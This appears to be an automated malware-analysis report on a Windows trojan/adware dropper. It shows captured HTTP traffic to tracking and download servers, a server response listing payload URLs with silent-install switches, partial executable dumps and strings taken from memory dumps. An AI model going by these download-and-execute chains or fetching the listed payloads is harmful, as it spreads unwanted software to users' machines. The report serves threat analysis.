GET /installer.gif?action=started&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&os=XP32&chver=X&ffver=X&iever=6&app=12345&srcid=003266&default=ie&ver=107&crtnm=OralTeams&rnd=2429 HTTP/1.1
Accept: */*
Host: mystats.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: mXR3Zv54paTqJBf4qr 24bc7PrHE5vdig1qWUI 5Nl4UX8Uq/RlZBnbwJwjtrHFH
x-amz-request-id: 3BD68FC8F05BE975
Date: Thu, 29 Oct 2015 07:31:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: mXR3Zv54paTqJBf4qr 24bc7PrHE5vdig1qWUI 5Nl4UX8Uq/RlZBnbwJwjtrHFH..x-amz-request-id: 3BD68FC8F05BE975..Date: Thu, 29 Oct 2015 07:31:07 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:41 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=8792 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:27 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1446103888.dop008.am4.t,1446103887.cds063.am4.c
GIF89a.............,...........D..;..
GET /?file=bundle&v=2 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.djapp.info
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 29 Oct 2015 07:35:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: hXXp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe
0..HTTP/1.1 302 Moved Temporarily..Server: nginx..Date: Thu, 29 Oct 2015 07:35:03 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..Location: hXXp://drz432f7yeokb.cloudfront.net/prepreinstaller_win.exe..0..
GET /prepreinstaller_win.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: drz432f7yeokb.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 299008
Connection: keep-alive
Date: Wed, 28 Oct 2015 13:52:38 GMT
Last-Modified: Wed, 28 Oct 2015 13:33:07 GMT
ETag: "8574ef2796bdf5b7c82ae981831e45a5"
Accept-Ranges: bytes
Server: AmazonS3
Age: 63516
X-Cache: Hit from cloudfront
Via: 1.1 73a3bce79e63d88b3a25c9ced0be16f5.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -6ja0cLnBjey5qebGeQpqGukrT5xMEAhIGlqp0dc8rlrE_sE71TtkQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......DG...&...&...&.......&....'.3&....&.}&...^...&...&..g&....#..&.......&...&...&.......&..Rich.&..........................PE..L...J.0V.............................!....... ....@.......................................@.....................................P...............................< ..................................H[..@............ ...............................text............................... ..`.rdata..\.... ......................@..@.data....3..........................@....rsrc...............................@..@.reloc..22.......4...\..............@..B..........................................................................................................................................................................................................................................................................................................................................d"B..X...V....d"B..J....D$..t.V.....Y..^...V..t.f.0f;1u.......Ju.3.^....f;.^.....@.j,.~.A........3..u....C.3..G......w..}..E.f...u..E.....;.......3..U....U..K..M....r.......f.<.=.........r...........P.E......Y..u.f.}. t.f.}./.......{..r........M.f....E..f.Du.F...u}3..|u.....E.j..E.P3..X.B......Ff.....|..E..M...........M.f.E..E...............f.E..E........E.3.f.E...D}..u.P.....G...|..}.3..}................j.Y;.}.3.... ...........|u.....f..3..|].....E.j..E.P3..X.B..k...Cf.....|..E..M...........M.f.E..
<<< skipped >>>
GET hXXp://events.lxhwspv.com/?p=cHViX2lkPTM1MyZzZXR1cF9pZD0xJmV4dHJhX3BhcmFtcz1TaWxlbnRJbnN0YWxsZXIgZ2xvYmFsIHN0YXJ0JmV2ZW50PTExJnNpZD02NjYmbWFjPTc3NyZhZHZfaWQ9MTI4JmJpdmVyc2lvbj0xLjg= HTTP/1.1
Host: events.lxhwspv.com
Proxy-Connection: Close
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Oct 2015 07:35:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0..HTTP/1.1 200 OK..Server: nginx..Date: Thu, 29 Oct 2015 07:35:12 GMT..Content-Type: text/html; charset=UTF-8..Transfer-Encoding: chunked..Connection: keep-alive..0..
GET /crcb/123/installer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.randkeygen.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:05 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1440089314"
Last-Modified: Thu, 20 Aug 2015 16:48:34 GMT
Cache-Control: max-age=2750
Content-Length: 1965128
Content-Type: application/x-msdownload
X-HW: 1446103865.dop009.fr7.t,1446103865.cds020.fr7.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............>.........q.............e...............b.......K.......r.........X.............:.......v.......?.....Rich....................PE..L......U.....................~....................@..........................p............@.......................................... ...A..............H....p..........8...........................h...@............................................text...T........................... ..`.rdata..z...........................@..@.data....0..........................@....rsrc....A... ...B..................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
GET /cmmdWriter.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d2fpsq9kg43yka.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 42851
Connection: keep-alive
Date: Thu, 29 Oct 2015 00:08:07 GMT
Last-Modified: Thu, 29 Oct 2015 00:00:47 GMT
ETag: "8217fb536a761fb752904d84de9e773f"
Accept-Ranges: bytes
Server: AmazonS3
Age: 26572
X-Cache: Hit from cloudfront
Via: 1.1 bc6c3158b6c70458bf3fc3895b89eba6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5O2Rd4xRZ0In7qGU1v8eRQDi9BwMg7Q4fu0zM0CIW27luUEd7XgzMQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................Z...........0.......p....@..........................................................................s.......p...............................................................................p...............................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data...x............p..............@....ndata...0...@...........................rsrc........p.......t..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>
GET /utility.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=106&os=XP32&browser=&campaign=003040&browserver=106&country=&error=na&action=mutex_already_exists&report=cberr&rnd=1906 HTTP/1.1
Accept: */*
Host: err.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: tek0gZGW6yv/cIzPEe JD88ru9T9yemmHz2mfhJn8ZDdIIrlxuMdIDdKqaQlL5sGHGTHflG7itk=
x-amz-request-id: 4EEDCB9AF6B7531D
Date: Thu, 29 Oct 2015 07:31:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: tek0gZGW6yv/cIzPEe JD88ru9T9yemmHz2mfhJn8ZDdIIrlxuMdIDdKqaQlL5sGHGTHflG7itk=..x-amz-request-id: 4EEDCB9AF6B7531D..Date: Thu, 29 Oct 2015 07:31:22 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /data.gif?app=12345&ibic=951432958192de010e9b45488dbf5014&verifier=7322dfe1785c6f32282020c020be2048&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=3&rnd=6474 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 29 Oct 2015 07:31:05 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1446103866.dop017.am4.t,1446103865.cds063.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 29 Oct 2015 07:31:05 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1446103866.dop017.am4.t,1446103865.cds063.am4.c..GIF89a.............,...........D..;..
GET /SilentInstaller_dotnet4.exe HTTP/1.1
Host: drz432f7yeokb.cloudfront.net
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 334336
Connection: keep-alive
Date: Wed, 28 Oct 2015 13:52:41 GMT
Last-Modified: Wed, 28 Oct 2015 13:26:05 GMT
ETag: "a46fd47af97a4430b0fa9ad56eb856d4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 63513
X-Cache: Hit from cloudfront
Via: 1.1 bc6c3158b6c70458bf3fc3895b89eba6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: erc3bw92p3cz5ig1KaVO3-2gxoJVoaIGMXSfaILjKbwyZAi827ECjQ==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....0V............................n&... ........@.. ....................................@..................................&..O....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P&......H...........To..........T...@ ...........................................(k...*..~....*...(....*Vs....(....t.........*....*.....N(....&*2..(....&..Z*....0..........(m.....c.d(....&..(......*..2..(....&..Z*....0..........(n.....c.d(....&..(......*..2..(....&..Z*....0..........(o.....c.d(....&..(......*..2..(....&..Z*....0..........(p.....c.d(....&..(......*..2..(....&..Z*....0..........(q.....c.d(....&..(......*..2..(....&..Z*....0..........(r.....c.d(....&..(......*..2..(....&..Z*....0..........(s.....c.d(....&..(......*..2..(....&..Z*....0..........(t.....c.d(....&..(......*..2..(....&..Z*....0..........(u.....c.d(....&..(......*..2..(....&..Z*....0..........(v.....c.d(....&..(......*..2..(....&..Z*....0..........(w.....c.d(....&..(......*..2..(....&..Z*....0..........(x.....c.d(....&..(......*..2..(....&..Z*....0..........(y.....c.d(....&..(......*..2..( ...&..Z*....0..........(z.....c.d(!...&..(......*..2..("...&..Z*....0..........({.....c.d(#...&..(......*..2..($...&..Z*....0..........(|.....c.d(%
<<< skipped >>>
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 29 Oct 2015 07:30:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.24
429..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-jot-cra-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://dl.randkeygen.com/crcb/123/installer.exe.. /installapp..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /idn /ch=NOCHPC..hXXp://VVV.djapp.info/?file=bundle&v=2.. -pub_id=353 -adv_id=128..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://mobilitydata5.com/Generic/rsstracker/feed_track.php?sid=6637476637.. ..hXXp://VVV.djapp.info/?file=bundle&v=2.. -pub_id=353 -adv_id=128..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..http://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..0..HTTP/1.1 200 OK..Server: nginx/1.8.0..Date: Thu, 29 Oct 2015 07:30:58 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.24..429..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-jot-cra-opw-crb-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..http://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://dl.randkeygen.com/crcb/
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Thu, 29 Oct 2015 07:30:59 GMT
Content-Type: application/octet-stream
Content-Length: 126474
Connection: keep-alive
X-Powered-By: PHP/5.5.24
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=LRP8nPI.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
nsu5.tmp_468:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp -pub_id=353 -adv_id=128
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp -pub_id=353 -adv_id=128
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp\inetc.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp\inetc.dll
hXXp://VVV.djapp.info/?file=bundle&v=2
hXXp://VVV.djapp.info/?file=bundle&v=2
ysInfo/SearchUpdater.exe&errorlevel=0
ysInfo/SearchUpdater.exe&errorlevel=0
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
System.dll
System.dll
callback%d
callback%d
@.reloc
@.reloc
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
8!8-8B8I8}8
8!8-8B8I8}8
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr22.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsr22.tmp
nsr22.tmp
nsr22.tmp
://livestatscounter.com/Generic/vos.php?ch=
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp
Uninstall.exe
Uninstall.exe
n.php?r=vu_vo2_
n.php?r=vu_vo2_
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsu5.tmp
nsu5.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl9.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsvB.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu5.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.djapp.info/?file=bundle&v=2&v=2\"}"}
archUpdater.exe&errorlevel=0&v=2\"}"}
archUpdater.exe&errorlevel=0&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://VVV.djapp.info/?file=bundle&v=2
url=hXXp://VVV.djapp.info/?file=bundle&v=2
Info/SearchUpdater.exe
Info/SearchUpdater.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nssE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nssE.tmp
dlgen.php?r=vu_vo2_
dlgen.php?r=vu_vo2_
)-.Yln
)-.Yln
Nullsoft Install System v2.46
Nullsoft Install System v2.46
1.0.0.1
1.0.0.1
nsq21.tmp_168:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
portuguese-brazilian
portuguese-brazilian
operator
operator
GetProcessWindowStation
GetProcessWindowStation
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ADVAPI32.dll
ADVAPI32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq21.tmp
=v~)%F
=v~)%F
~#ÊS
~#ÊS
nKERNEL32.DLL
nKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
LxHWSpv.com
LxHWSpv.com
52.1.45.42:80
52.1.45.42:80
chrome.exe_1980:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
SHA256 block transform for x86, CRYPTOGAMS by
SHA256 block transform for x86, CRYPTOGAMS by
u.QQQQQj
u.QQQQQj
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
user32.dll
user32.dll
c:\projects\chromium_clean\src\chrome\app\chrome_exe_main_win.cc
c:\projects\chromium_clean\src\chrome\app\chrome_exe_main_win.cc
No valid Chrome version found
No valid Chrome version found
c:\projects\chromium_clean\src\chrome\app\client_util.cc
c:\projects\chromium_clean\src\chrome\app\client_util.cc
Failed to load Chrome DLL from
Failed to load Chrome DLL from
ChromeMain
ChromeMain
RelaunchChromeBrowserWithNewCommandLineIfNeeded
RelaunchChromeBrowserWithNewCommandLineIfNeeded
Could not find exported function
Could not find exported function
1.3.21.115
1.3.21.115
Chrome
Chrome
0.0.0.0-devel
0.0.0.0-devel
url-chunk
url-chunk
font_key_name
font_key_name
subresource_url
subresource_url
%s-%x
%s-%x
CHROME_MAIN_TIME
CHROME_MAIN_TIME
c:\projects\chromium_clean\src\chrome\installer\util\install_util.cc
c:\projects\chromium_clean\src\chrome\installer\util\install_util.cc
chrome-sxs
chrome-sxs
googlechromeframe
googlechromeframe
Cannot initialize AppCommands from an invalid key.
Cannot initialize AppCommands from an invalid key.
c:\projects\chromium_clean\src\chrome\installer\util\app_commands.cc
c:\projects\chromium_clean\src\chrome\installer\util\app_commands.cc
Failed to open key "
Failed to open key "
Skipping over key "
Skipping over key "
c:\projects\chromium_clean\src\chrome\installer\util\language_selector.cc
c:\projects\chromium_clean\src\chrome\installer\util\language_selector.cc
Cannot initialize an AppCommand from an invalid key.
Cannot initialize an AppCommand from an invalid key.
c:\projects\chromium_clean\src\chrome\installer\util\app_command.cc
c:\projects\chromium_clean\src\chrome\installer\util\app_command.cc
c:\projects\chromium_clean\src\chrome\app\image_pre_reader_win.cc
c:\projects\chromium_clean\src\chrome\app\image_pre_reader_win.cc
Check failed: pe_image.VerifyMagic().
Check failed: pe_image.VerifyMagic().
reinterpret_cast(section 1)
reinterpret_cast(section 1)
section == pe_image.GetImageSectionFromAddr(start)
section == pe_image.GetImageSectionFromAddr(start)
section == pe_image.GetImageSectionFromAddr(start length - 1)
section == pe_image.GetImageSectionFromAddr(start length - 1)
(0x%X)
(0x%X)
Error (0x%X) while retrieving error. (0x%X)
Error (0x%X) while retrieving error. (0x%X)
c:\projects\chromium_clean\src\base\win\scoped_handle.cc
c:\projects\chromium_clean\src\base\win\scoped_handle.cc
%s-%Iu
%s-%Iu
(%d = %3.1f%%)
(%d = %3.1f%%)
Histogram: %s recorded %d samples
Histogram: %s recorded %d samples
(flags = 0x%x)
(flags = 0x%x)
PlatformFile.UnknownErrors.Windows
PlatformFile.UnknownErrors.Windows
c:\projects\chromium_clean\src\base\pickle.cc
c:\projects\chromium_clean\src\base\pickle.cc
.thunks
.thunks
.syzygy
.syzygy
Check failed: PlatformThreadLocalStorage::AllocTLS(&key).
Check failed: PlatformThreadLocalStorage::AllocTLS(&key).
c:\projects\chromium_clean\src\base\threading\thread_local_storage.cc
c:\projects\chromium_clean\src\base\threading\thread_local_storage.cc
Check failed: PlatformThreadLocalStorage::AllocTLS(&key) && key != PlatformThreadLocalStorage::TLS_KEY_OUT_OF_INDEXES.
Check failed: PlatformThreadLocalStorage::AllocTLS(&key) && key != PlatformThreadLocalStorage::TLS_KEY_OUT_OF_INDEXES.
Check failed: !PlatformThreadLocalStorage::GetTLSValue(key).
Check failed: !PlatformThreadLocalStorage::GetTLSValue(key).
kernel32.dll
kernel32.dll
c:\projects\chromium_clean\src\sandbox\win\src\broker_services.cc
c:\projects\chromium_clean\src\sandbox\win\src\broker_services.cc
Check failed: AssociateCompletionPort(tracker->job, job_port_, tracker.get()).
Check failed: AssociateCompletionPort(tracker->job, job_port_, tracker.get()).
c:\projects\chromium_clean\src\sandbox\win\src\sandbox_policy_base.cc
c:\projects\chromium_clean\src\sandbox\win\src\sandbox_policy_base.cc
c:\projects\chromium_clean\src\sandbox\win\src\handle_closer_agent.cc
c:\projects\chromium_clean\src\sandbox\win\src\handle_closer_agent.cc
Check failed: name.second.
Check failed: name.second.
c:\projects\chromium_clean\src\sandbox\win\src\interception.cc
